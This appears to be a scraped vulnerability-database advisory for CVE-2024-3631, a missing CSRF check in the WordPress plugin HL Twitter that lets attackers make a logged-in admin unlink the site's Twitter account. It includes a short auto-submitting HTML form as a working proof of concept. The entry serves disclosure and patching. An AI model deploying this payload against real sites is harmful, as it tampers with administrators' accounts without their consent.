Lucene search
Bob MatyasWPEX-ID:C59A8B49-6F3E-452B-BA9B-50B80C522EE9HistoryApr 24, 2024 - 12:00 a.m.
HL Twitter <= 2014.1.18 - Unlink Twitter Account via CSRF
2024-04-2400:00:00
Bob Matyas
55
csrf
unlink twitter
exploit
security patch
vulnerability update
information disclosure
Description The plugin does not have CSRF check when unlinking twitter accounts, which could allow attackers to make logged in admins perform such actions via a CSRF attack
Make an admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="http://example.com/wp-admin/admin.php?page=hl_twitter_settings&action=unlink" method="POST">
<input type="submit" name="submit" value="Unlink" class="button-primary">
</form>
</body>
```
The Twitter connection will be removed (API tokens reset to `''`)Related
vulnrichment
vulnrichment
CVE-2024-3631 HL Twitter <= 2014.1.18 - Unlink Twitter Account via CSRF
2024-05-15 06:00:04
wpvulndb
wpvulndb
HL Twitter <= 2014.1.18 - Unlink Twitter Account via CSRF
2024-04-24 00:00:00
cve
cve
CVE-2024-3631
2024-05-15 06:15:13
nvd
nvd
CVE-2024-3631
2024-05-15 06:15:13
cvelist
cvelist
CVE-2024-3631 HL Twitter <= 2014.1.18 - Unlink Twitter Account via CSRF
2024-05-15 06:00:04
wordfence
wordfence
AI Score
6.7
Confidence
Low
EPSS
0
Percentile
9.0%
Related for WPEX-ID:C59A8B49-6F3E-452B-BA9B-50B80C522EE9